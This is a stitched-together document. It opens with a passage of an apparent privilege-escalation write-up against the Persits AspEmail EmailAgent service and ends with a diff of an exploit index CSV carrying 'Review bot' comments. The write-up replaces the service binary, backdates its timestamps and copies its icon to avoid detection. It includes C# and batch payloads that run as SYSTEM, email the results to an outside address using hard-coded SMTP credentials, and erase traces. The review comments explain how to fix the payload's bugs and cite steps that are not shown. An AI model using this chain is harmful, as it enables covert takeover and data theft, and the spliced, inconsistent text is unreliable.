[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>ren EmailAgentPrivESC.exe EmailAgent.exe
# ==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
13.04.2023 22:00 12.288 EmailAgent.exe <<<=== ReNamed for EmailAgentPrivESC.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
# ==================================================================================================================
* We are now making the settings on Last Modified Date, Creation Date and Last Accessed Date.
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>nircmd.exe setfiletime "EmailAgent.exe" "24.03.2007 09:21:30" "24.03.2007 09:21:30" "23.05.2017 06:42:28"
[+] C:\Program Files (x86)\Persits Software\AspEmail\BIN>del nircmd.exe
* And next is we are making extracting the real EmailAgent.exe file icon and changing the icon for exploit. This way, we will make it harder to detect.
* I used the Resource Tuner Console tool.
>>> http://www.restuner.com/tour-resource-tuner-console.htm
* This can be done easily with the Resource Tuner tool.
>>> http://www.resource-editor.com/how-to-change-icons-in-exe.html
>>> http://www.restuner.com/download.htm
# ==================================================================================================================
[+] C:\Program Files (x86)\Persits Software\AspEmail\Bin>dir
Volume in drive C has no label.
Volume Serial Number is 0C8A-5291
Directory of C:\Program Files (x86)\Persits Software\AspEmail\Bin
14.04.2023 16:47 <DIR> .
14.04.2023 16:47 <DIR> ..
01.03.2004 15:55 143.360 AspEmail.dll
25.02.2004 16:23 188.416 AspUpload.dll
24.09.2003 09:21 12.288 EmailAgent.exe
24.09.2003 09:22 139.264 EmailAgentCfg.cpl
24.09.2003 09:25 94.208 EmailLogger.dll
24.09.2003 09:21 167.936 Null.EmailAgent.exe
6 File(s) 745.472 bytes
2 Dir(s) 165.936.717.824 bytes free
[24.09.2003 09:21] 12.288 EmailAgent.exe
[24.09.2003 09:21] 167.936 Null.EmailAgent.exe
* And time manipulation is over. They look like they were uploaded at the same time long ago.
# ==================================================================================================================
* Now we check for my malware ownership.
[+] C:\PenTest>WMIC Path Win32_LogicalFileSecuritySetting WHERE Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe" ASSOC /RESULTROLE:Owner /ASSOCCLASS:Win32_LogicalFileOwner /RESULTCLASS:Win32_SID
__PATH
\\DeepSecLab\root\cimv2:Win32_LogicalFileSecuritySetting.Path="C:\\Program Files (x86)\\Persits Software\\AspEmail\\Bin\\EmailAgent.exe"
\\DeepSecLab\root\cimv2:Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" root\cimv2 DeepSecLab {} 5 Win32_SID.SID="S-1-5-21-3674093405-176013069-2091862131-1511" Win32_SID Win32_SID 2 Hacker {1, 5, 0, 0, 0, 0, 0, 5, 21, 0, 0, 0, 93, 55, 254, 218, 13, 191, 125, 10, 115, 72, 175, 124, 231, 5, 0, 0} DeepSecLab S-1-5-21-3674093405-176013069-2091862131-1511 28
[+] C:\PenTest>WMIC UserAccount WHERE sid="S-1-5-21-3674093405-176013069-2091862131-1511" GET Name
Name
DeepSecLab\Hacker
EmailAgent.exe Owner: DeepSecLab\Hacker
# =================================================================================================================#
# #
####################################################################################################################
# #[EmailAgent.cs]# #
####################################################################################################################
# #
#
* We program this malware in such a way that when the server is reboot(when the services are restarted), #
* It will be triggered and execute the codes we want, #
* And then send a printout of all this to the email address we specified. #
#
using System; #
using System.Linq; #
using System.Text; #
using System.Diagnostics; #
using System.IO; #
using System.Collections; #
#
Namespace CliToolSpace #
{ #
class _Main #
{ #
static void Main(string[] args) #
{ #
Cli commandLine = new Cli(); #
commandLine.FileToCli(@"C:\Windows\Temp\Mail.exe & C:\Windows\Temp\Run.bat"); #
commandLine.Execute(); #
commandLine.ToFile(@"C:\Windows\Temp\"); #
} #
} #
} #
#
# #
####################################################################################################################
# #[Mail.cs]# #
####################################################################################################################
# #
#
using System; #
using System.Net.Mail; #
using System.Net; #
SmtpClient SmtpServer = new SmtpClient("smtp.deepseclab.com"); #
var mail = new MailMessage(); #
mail.From = new MailAddress("mail@deepseclab.com"); #
mail.To.Add("mail@hacker.com"); #
mail.Subject = "Trigger Successful!"; #
mail.IsBodyHtml = true; #
string htmlBody; #
htmlBody = "<strong>This server has been rebooted.</strong>"; #
mail.Body = htmlBody; #
Attachment attachment; #
attachment = new Attachment(@"C:\Windows\Temp\Export.txt"); #
mail.Attachments.Add(attachment); #
SmtpServer.Port = 587; #
SmtpServer.UseDefaultCredentials = false; #
SmtpServer.Credentials = new System.Net.NetworkCredential("mail@deepseclab.com","p@ssw0rd123"); #
SmtpServer.EnableSsl = true; #
SmtpServer.Timeout = int.MaxValue; #
SmtpServer.Send(mail); #
#
# #
####################################################################################################################
# #[Run.bat]# #
####################################################################################################################
# #
#
whoami > C:\Windows\Temp\Export.txt #
cd C:\Program Files (x86)\Persits Software\AspEmail\Bin #
del EmailAgent.exe & ren Null.EmailAgent.exe EmailAgent.exe #
cd c:\Windows\Tasks #
del Run.bat & del Mail.exe #
#
# #
####################################################################################################################
# #
[+]Trigger Successful![+] #
#
[+] C:\PenTest>systeminfo | findstr "Boot Time" #
System Boot Time: 13.04.2022, 07:46:06 #
#
# #
####################################################################################################################
#[Export.txt]# #
####################################################################################################################
# #
#
NT AUTHORITY\SYSTEM #
#
# #
####################################################################################################################
# #
# ==================================================================================================================
# ...|||[FIX]|||... #
# ==================================================================================================================
# [+] C:\>Runas /profile /user:DeepSecLab\Administrator CMD [+] #
# =================================================================================================================#
[+] C:\Administrator>sc qc "Persits Software EmailAgent"
[SC] QueryServiceConfig SUCCESS
SERVICE_Name: Persits Software EmailAgent
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_Name : "C:\Program Files (x86)\Persits Software\AspEmail\BIN\EmailAgent.exe" /run
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_Name : Persits Software EmailAgent
DEPENDENCIES : rpcss
SERVICE_START_Name : LocalSystem
# ==================================================================================================================
[+] C:\Administrator>sc sdshow "Persits Software EmailAgent"
D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
# ==================================================================================================================
[+] C:\Administrator>accesschk64.exe -wuvc "Persits Software EmailAgent" -accepteula
Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com
Persits Software EmailAgent
Medium Mandatory Level (Default) [No-Write-Up]
RW NT AUTHORITY\SYSTEM
SERVICE_ALL_ACCESS
RW BUILTIN\Administrators
SERVICE_ALL_ACCESS
# ==================================================================================================================
[+] C:\Administrator>ICACLS "C:\Program Files (x86)\Persits Software" /T /Q /C /RESET
[+] C:\PenTest>ICACLS "C:\Program Files (x86)\Persits Software\AspEmail\BIN"
Successfully processed 0 files; Failed processing 1 files
C:\Program Files (x86)\Persits Software\AspEmail\Bin: Access is denied.
DONE!
# ==================================================================================================================
[+] C:\Administrator>sc stop "Persits Software EmailAgent"
[+] PS C:\Administrator> Start-Service -Name "Persits Software EmailAgent"
* These commands are optional. Used to stop the "Persits Software EmailAgent" service. We fixed the vulnerability and I don't think it's necessary anymore.
# ==================================================================================================================
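Review bot: the trigger chain in EmailAgent.cs runs `Mail.exe & Run.bat` in that order, but Mail.cs attaches `C:\Windows\Temp\Export.txt`, which only Run.bat creates (`whoami > C:\Windows\Temp\Export.txt`), so the first run throws a FileNotFoundException in `new Attachment(...)` before anything is sent; run Run.bat first, or write Export.txt from the agent. Related defects in the same listings: the `certutil` line fetches `Run.exe` but saves it as `Run.bat`; Run.bat does `cd c:\Windows\Tasks` to delete files that were dropped in `C:\Windows\Temp`; `del EmailAgent.exe` targets the image of the very process that launched the batch, which Windows will not delete while it runs (rename it instead, as the write-up already does for the original); and `Namespace` must be lowercase `namespace` while the `Cli` class is never defined, so EmailAgent.cs does not compile as shown. The `takeown` step is also unnecessary, because `Everyone:(OI)(CI)(F)` already grants full control, and it leaves `DeepSecLab\Hacker` as owner (the WMIC owner check near the end shows exactly that), which undoes the timestamp anti-forensics. Minor: `System Boot Time: 13.04.2022` is a year off from the rest of the write-up.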


@ -3592,6 +3592,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38437,exploits/hardware/remote/38437.txt,"Foscam IP (Multiple Cameras) - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,remote,hardware,,2013-04-09,2015-10-10,1,,,,,,https://www.securityfocus.com/bid/58943/info 38437,exploits/hardware/remote/38437.txt,"Foscam IP (Multiple Cameras) - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-09,shekyan,remote,hardware,,2013-04-09,2015-10-10,1,,,,,,https://www.securityfocus.com/bid/58943/info
39195,exploits/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",remote,hardware,,2014-05-08,2016-01-08,1,CVE-2014-1849;OSVDB-106777,,,,,https://www.securityfocus.com/bid/67510/info 39195,exploits/hardware/remote/39195.c,"Foscam IP Camera - Predictable Credentials Security Bypass",2014-05-08,"Sergey Shekyan",remote,hardware,,2014-05-08,2016-01-08,1,CVE-2014-1849;OSVDB-106777,,,,,https://www.securityfocus.com/bid/67510/info
51321,exploits/hardware/remote/51321.txt,"Franklin Fueling Systems TS-550 - Exploit and Default Password",2023-04-07,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-07,2023-04-07,0,,,,,, 51321,exploits/hardware/remote/51321.txt,"Franklin Fueling Systems TS-550 - Exploit and Default Password",2023-04-07,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-07,2023-04-07,0,,,,,,
51382,exploits/hardware/remote/51382.txt,"Franklin Fueling Systems TS-550 - Default Password",2023-04-20,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-20,2023-04-20,0,,,,,,
49293,exploits/hardware/remote/49293.txt,"FRITZ!Box 7.20 - DNS Rebinding Protection Bypass",2020-12-18,"RedTeam Pentesting GmbH",remote,hardware,,2020-12-18,2020-12-18,0,CVE-2020-26887,,,,, 49293,exploits/hardware/remote/49293.txt,"FRITZ!Box 7.20 - DNS Rebinding Protection Bypass",2020-12-18,"RedTeam Pentesting GmbH",remote,hardware,,2020-12-18,2020-12-18,0,CVE-2020-26887,,,,,
32753,exploits/hardware/remote/32753.rb,"Fritz!Box Webcm - Command Injection (Metasploit)",2014-04-08,Metasploit,remote,hardware,,2014-04-08,2014-04-08,1,OSVDB-103289,"Metasploit Framework (MSF)",,,, 32753,exploits/hardware/remote/32753.rb,"Fritz!Box Webcm - Command Injection (Metasploit)",2014-04-08,Metasploit,remote,hardware,,2014-04-08,2014-04-08,1,OSVDB-103289,"Metasploit Framework (MSF)",,,,
4744,exploits/hardware/remote/4744.txt,"FS4104-AW VDSL Device (Rooter) - GoAhead WebServer Disclosure",2007-12-18,NeoCoderz,remote,hardware,,2007-12-17,2018-01-25,1,OSVDB-43168;CVE-2007-6702,,,,, 4744,exploits/hardware/remote/4744.txt,"FS4104-AW VDSL Device (Rooter) - GoAhead WebServer Disclosure",2007-12-18,NeoCoderz,remote,hardware,,2007-12-17,2018-01-25,1,OSVDB-43168;CVE-2007-6702,,,,,
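Review bot: the new row 51382 (`Franklin Fueling Systems TS-550 - Default Password`, 2023-04-20) sits directly under 51321 (`Franklin Fueling Systems TS-550 - Exploit and Default Password`, 2023-04-07) from the same author, and both have empty CVE and reference columns; confirm the new file is not a resubmission of 51321 and, if it supersedes it, mark the older entry rather than keeping two near-identical rows for the same device and weakness.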
@ -5605,6 +5606,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
43849,exploits/json/webapps/43849.txt,"Shopware 5.2.5/5.3 - Cross-Site Scripting",2018-01-21,Vulnerability-Lab,webapps,json,,2018-01-21,2018-01-21,0,CVE-2017-15374,,,,, 43849,exploits/json/webapps/43849.txt,"Shopware 5.2.5/5.3 - Cross-Site Scripting",2018-01-21,Vulnerability-Lab,webapps,json,,2018-01-21,2018-01-21,0,CVE-2017-15374,,,,,
42332,exploits/json/webapps/42332.rb,"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)",2017-07-18,xort,webapps,json,,2017-07-18,2017-07-18,1,CVE-2017-6182,,,,, 42332,exploits/json/webapps/42332.rb,"Sophos Web Appliance 4.3.0.2 - 'trafficType' Remote Command Injection (Metasploit)",2017-07-18,xort,webapps,json,,2017-07-18,2017-07-18,1,CVE-2017-6182,,,,,
42111,exploits/json/webapps/42111.txt,"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection",2017-06-02,"Goran Tuzovic",webapps,json,,2017-06-02,2017-08-18,0,CVE-2016-6566,,,,, 42111,exploits/json/webapps/42111.txt,"Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection",2017-06-02,"Goran Tuzovic",webapps,json,,2017-06-02,2017-08-18,0,CVE-2016-6566,,,,,
51379,exploits/json/webapps/51379.txt,"Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information",2023-04-20,"Rafael Cintra Lopes",webapps,json,,2023-04-20,2023-04-20,0,,,,,,
39488,exploits/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery",2016-02-23,"Julien Ahrens",webapps,json,8443,2016-02-23,2016-02-23,0,,,,,, 39488,exploits/json/webapps/39488.txt,"Ubiquiti Networks UniFi 3.2.10 - Cross-Site Request Forgery",2016-02-23,"Julien Ahrens",webapps,json,8443,2016-02-23,2016-02-23,0,,,,,,
40030,exploits/json/webapps/40030.py,"Untangle NGFW 12.1.0 Beta - 'execEvil()' Command Injection",2016-06-28,"Matt Bush",webapps,json,80,2016-06-28,2016-06-28,0,,,,,, 40030,exploits/json/webapps/40030.py,"Untangle NGFW 12.1.0 Beta - 'execEvil()' Command Injection",2016-06-28,"Matt Bush",webapps,json,80,2016-06-28,2016-06-28,0,,,,,,
48002,exploits/json/webapps/48002.py,"Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)",2020-02-05,nxkennedy,webapps,json,,2020-02-05,2020-02-05,0,CVE-2019-10716,,,,, 48002,exploits/json/webapps/48002.py,"Verodin Director Web Console 3.5.4.0 - Remote Authenticated Password Disclosure (PoC)",2020-02-05,nxkennedy,webapps,json,,2020-02-05,2020-02-05,0,CVE-2019-10716,,,,,
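Review bot: the new 51379 row (Swagger UI 4.1.3) leaves both the CVE and the source-URL columns empty, while every other row in this hunk (43849, 42332, 42111, 48002) carries a CVE; its description, "User Interface (UI) Misrepresentation of Critical Information", reads as a weakness-category title rather than a finding, so either add the advisory link or reword the description to say what is misrepresented and where in the UI. The platform value "json" matches the neighbouring UniFi, Untangle and Sophos rows, so that column is consistent.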
@ -7293,6 +7295,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
41994,exploits/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",local,linux,,2017-05-11,2019-07-26,1,CVE-2017-7308,Local,,,,https://github.com/xairy/kernel-exploits/blob/44fcbaafcb2988d3cbfee5d417b17368e15c78bf/CVE-2017-7308/poc.c 41994,exploits/linux/local/41994.c,"Linux Kernel 4.8.0-41-generic (Ubuntu) - Packet Socket Local Privilege Escalation",2017-05-11,"Andrey Konovalov",local,linux,,2017-05-11,2019-07-26,1,CVE-2017-7308,Local,,,,https://github.com/xairy/kernel-exploits/blob/44fcbaafcb2988d3cbfee5d417b17368e15c78bf/CVE-2017-7308/poc.c
50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",2021-11-23,"Ujas Dhami",local,linux,,2021-11-23,2021-11-23,0,CVE-2019-13272,,,,, 50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",2021-11-23,"Ujas Dhami",local,linux,,2021-11-23,2021-11-23,0,CVE-2019-13272,,,,,
50808,exploits/linux/local/50808.c,"Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)",2022-03-08,"Lance Biggerstaff",local,linux,,2022-03-08,2022-03-08,0,CVE-2022-0847,,,,, 50808,exploits/linux/local/50808.c,"Linux Kernel 5.8 < 5.16.11 - Local Privilege Escalation (DirtyPipe)",2022-03-08,"Lance Biggerstaff",local,linux,,2022-03-08,2022-03-08,0,CVE-2022-0847,,,,,
51384,exploits/linux/local/51384.txt,"Linux Kernel 6.2 - Userspace Processes To Enable Mitigation",2023-04-20,nu11secur1ty,local,linux,,2023-04-20,2023-04-20,0,CVE-2023-1998,,,,,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,,2003-04-13,2016-02-25,1,OSVDB-4565;CVE-2003-0127,,,,http://www.exploit-db.comlinux-2.4.19.tar.gz, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,,2003-04-13,2016-02-25,1,OSVDB-4565;CVE-2003-0127,,,,http://www.exploit-db.comlinux-2.4.19.tar.gz,
4756,exploits/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,local,linux,,2007-12-17,2016-11-08,1,,,,,http://www.exploit-db.comlinux-2.6.11.1.tar.gz, 4756,exploits/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - BlueTooth Stack Privilege Escalation",2007-12-18,Backdoored,local,linux,,2007-12-17,2016-11-08,1,,,,,http://www.exploit-db.comlinux-2.6.11.1.tar.gz,
9363,exploits/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure",2009-08-05,"Jon Oberheide",local,linux,,2009-08-04,,1,CVE-2005-4605;OSVDB-22212,,,,, 9363,exploits/linux/local/9363.c,"Linux Kernel < 2.6.14.6 - 'procfs' Kernel Memory Disclosure",2009-08-05,"Jon Oberheide",local,linux,,2009-08-04,,1,CVE-2005-4605;OSVDB-22212,,,,,
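Review bot: the description on row 51384, "Userspace Processes To Enable Mitigation", is a sentence fragment that names neither an impact nor a vulnerability class, unlike every adjacent Linux Kernel row ("Packet Socket Local Privilege Escalation", "Local Privilege Escalation (DirtyPipe)", "'procfs' Kernel Memory Disclosure"); it reads like a clause lifted from the CVE-2023-1998 summary. Reword it to state what the attacker gains, and since the file is a .txt typed "local" rather than a compiled exploit like its .c neighbours, mark it "(PoC)" the way row 48002 does if it only documents the issue.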
@ -10993,6 +10996,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19492,exploits/multiple/remote/19492.txt,"Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",remote,multiple,,1999-09-13,2012-06-30,1,CVE-1999-0750,,,,,https://www.securityfocus.com/bid/630/info 19492,exploits/multiple/remote/19492.txt,"Microsoft Internet Explorer 5 / Netscape Communicator 4.0/4.5/4.6 - JavaScript STYLE",1999-09-13,"Georgi Guninski",remote,multiple,,1999-09-13,2012-06-30,1,CVE-1999-0750,,,,,https://www.securityfocus.com/bid/630/info
24189,exploits/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,remote,multiple,,2004-06-10,2013-01-17,1,,,,,,https://www.securityfocus.com/bid/10517/info 24189,exploits/multiple/remote/24189.html,"Microsoft Internet Explorer 5.0.1 / Opera 7.51 - URI Obfuscation",2004-06-10,http-equiv,remote,multiple,,2004-06-10,2013-01-17,1,,,,,,https://www.securityfocus.com/bid/10517/info
19451,exploits/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,remote,multiple,,1999-08-11,2012-06-28,1,CVE-1999-0875;OSVDB-1039,,,,,https://www.securityfocus.com/bid/578/info 19451,exploits/multiple/remote/19451.txt,"Microsoft Windows 98a/98b/98SE / Solaris 2.6 - IRDP",1999-08-11,L0pth,remote,multiple,,1999-08-11,2012-06-28,1,CVE-1999-0875;OSVDB-1039,,,,,https://www.securityfocus.com/bid/578/info
51376,exploits/multiple/remote/51376.txt,"Microsoft Word 16.72.23040900 - Remote Code Execution (RCE)",2023-04-20,nu11secur1ty,remote,multiple,,2023-04-20,2023-04-20,0,CVE-2023-28311,,,,,
20425,exploits/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",remote,multiple,,2000-11-22,2012-08-11,1,CVE-2000-1173;OSVDB-11344,,,,,https://www.securityfocus.com/bid/1977/info 20425,exploits/multiple/remote/20425.pl,"Microsys CyberPatrol 4.0 4.003/4.0 4.005 - Insecure Registration",2000-11-22,"Joey Maier",remote,multiple,,2000-11-22,2012-08-11,1,CVE-2000-1173;OSVDB-11344,,,,,https://www.securityfocus.com/bid/1977/info
12114,exploits/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,cp77fk4r,remote,multiple,,2010-04-07,,1,OSVDB-63877;OSVDB-63876;OSVDB-63875;OSVDB-63874,,,,http://www.exploit-db.comWebServer-171.zip, 12114,exploits/multiple/remote/12114.txt,"miniature java Web server 1.71 - Multiple Vulnerabilities",2010-04-08,cp77fk4r,remote,multiple,,2010-04-07,,1,OSVDB-63877;OSVDB-63876;OSVDB-63875;OSVDB-63874,,,,http://www.exploit-db.comWebServer-171.zip,
36839,exploits/multiple/remote/36839.py,"MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series",2015-04-27,"Onur Alanbel (BGA)",remote,multiple,,2015-04-27,2018-11-15,0,CVE-2013-0230;OSVDB-89624,,,,http://www.exploit-db.comminiupnpd-1.0.tar.gz, 36839,exploits/multiple/remote/36839.py,"MiniUPnPd 1.0 (MIPS) - Remote Stack Overflow Remote Code Execution for AirTies RT Series",2015-04-27,"Onur Alanbel (BGA)",remote,multiple,,2015-04-27,2018-11-15,0,CVE-2013-0230;OSVDB-89624,,,,http://www.exploit-db.comminiupnpd-1.0.tar.gz,
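Review bot: row 51376 types the Microsoft Word 16.72.23040900 RCE as "remote" under multiple/remote, yet file-parsing bugs that require the victim to open a document are typed "local" further down in this same diff (DeepBurner '.dbr' rows 16675 and 2950, feedDemon '.opml' row 11379 under windows/local); pick one convention for client-side file-format exploits. The build string 16.72.23040900 pins a single Word client build, so check whether "multiple" is the right platform or whether the row belongs under the platform that build ships on. CVE-2023-28311 is set but the reference column is empty; the vendor advisory URL would let readers verify the mapping.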
@ -14431,6 +14435,8 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
28307,exploits/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple SQL Injections",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29090,,,,,https://www.securityfocus.com/bid/19240/info 28307,exploits/php/webapps/28307.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'admin.php' Multiple SQL Injections",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29090,,,,,https://www.securityfocus.com/bid/19240/info
28308,exploits/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'members.php?cfg_root' Remote File Inclusion",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3964;OSVDB-29091,,,,,https://www.securityfocus.com/bid/19240/info 28308,exploits/php/webapps/28308.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'members.php?cfg_root' Remote File Inclusion",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3964;OSVDB-29091,,,,,https://www.securityfocus.com/bid/19240/info
28306,exploits/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'signup.php?site_name' SQL Injection",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29089,,,,,https://www.securityfocus.com/bid/19240/info 28306,exploits/php/webapps/28306.txt,"Banex PHP MySQL Banner Exchange 2.21 - 'signup.php?site_name' SQL Injection",2006-07-31,SirDarckCat,webapps,php,,2006-07-31,2013-09-15,1,CVE-2006-3963;OSVDB-29089,,,,,https://www.securityfocus.com/bid/19240/info
51378,exploits/php/webapps/51378.txt,"Bang Resto v1.0 - 'Multiple' SQL Injection",2023-04-20,"Rahad Chowdhury",webapps,php,,2023-04-20,2023-04-20,0,CVE-2023-29849,,,,,
51377,exploits/php/webapps/51377.txt,"Bang Resto v1.0 - Stored Cross-Site Scripting (XSS)",2023-04-20,"Rahad Chowdhury",webapps,php,,2023-04-20,2023-04-20,0,CVE-2023-29848,,,,,
51175,exploits/php/webapps/51175.txt,"Bangresto 1.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,, 51175,exploits/php/webapps/51175.txt,"Bangresto 1.0 - SQL Injection",2023-03-31,nu11secur1ty,webapps,php,,2023-03-31,2023-03-31,0,,,,,,
41989,exploits/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,webapps,php,,2017-05-10,2017-05-10,0,,,,,http://www.exploit-db.comBanManager-WebUI-1.5.8.zip, 41989,exploits/php/webapps/41989.txt,"BanManager WebUI 1.5.8 - PHP Code Injection",2017-05-10,HaHwul,webapps,php,,2017-05-10,2017-05-10,0,,,,,http://www.exploit-db.comBanManager-WebUI-1.5.8.zip,
17107,exploits/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,webapps,php,,2011-04-03,2011-04-03,1,,,,,, 17107,exploits/php/webapps/17107.txt,"Banner Ad Management Script - SQL Injection",2011-04-03,Egyptian.H4x0rz,webapps,php,,2011-04-03,2011-04-03,1,,,,,,
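Review bot: rows 51378 and 51377 spell the product "Bang Resto v1.0" while the existing row 51175 two lines down spells it "Bangresto 1.0", so three advisories for one application no longer group together under the alphabetical sort, and 51378 ("'Multiple' SQL Injection") may overlap with 51175 ("SQL Injection") from three weeks earlier; normalize the name to one form and, if 51378 covers the same parameters as 51175, flag it as a follow-up. Also, the single quotes around 'Multiple' follow the convention this file uses for a parameter or script name ('admin.php', 'trafficType'); the unquoted "Multiple SQL Injections" form on rows 28307 and 15223 is what is meant here.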
@ -15467,6 +15473,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
33967,exploits/php/webapps/33967.txt,"Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,webapps,php,,2010-01-20,2014-07-05,1,,,,,,https://www.securityfocus.com/bid/40024/info 33967,exploits/php/webapps/33967.txt,"Chipmunk NewsLetter 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2010-01-20,b0telh0,webapps,php,,2010-01-20,2014-07-05,1,,,,,,https://www.securityfocus.com/bid/40024/info
15223,exploits/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,webapps,php,,2010-10-09,2010-10-09,1,OSVDB-68620;CVE-2010-4799,,,,http://www.exploit-db.compwngame.zip, 15223,exploits/php/webapps/15223.txt,"Chipmunk Pwngame - Multiple SQL Injections",2010-10-09,KnocKout,webapps,php,,2010-10-09,2010-10-09,1,OSVDB-68620;CVE-2010-4799,,,,http://www.exploit-db.compwngame.zip,
7227,exploits/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,webapps,php,,2008-11-24,,1,OSVDB-57377;CVE-2008-7072;OSVDB-50345;CVE-2008-7071,,,,, 7227,exploits/php/webapps/7227.txt,"chipmunk topsites - Authentication Bypass / Cross-Site Scripting",2008-11-25,ZoRLu,webapps,php,,2008-11-24,,1,OSVDB-57377;CVE-2008-7072;OSVDB-50345;CVE-2008-7071,,,,,
51383,exploits/php/webapps/51383.py,"Chitor-CMS v1.1.2 - Pre-Auth SQL Injection",2023-04-20,msd0pe,webapps,php,,2023-04-20,2023-04-20,0,,,,,,
31390,exploits/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - 'category' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57649,,,,,https://www.securityfocus.com/bid/28219/info 31390,exploits/php/webapps/31390.txt,"Chris LaPointe Download Center 1.2 - 'category' Cross-Site Scripting",2008-03-12,ZoRLu,webapps,php,,2008-03-12,2014-02-04,1,CVE-2008-7134;OSVDB-57649,,,,,https://www.securityfocus.com/bid/28219/info
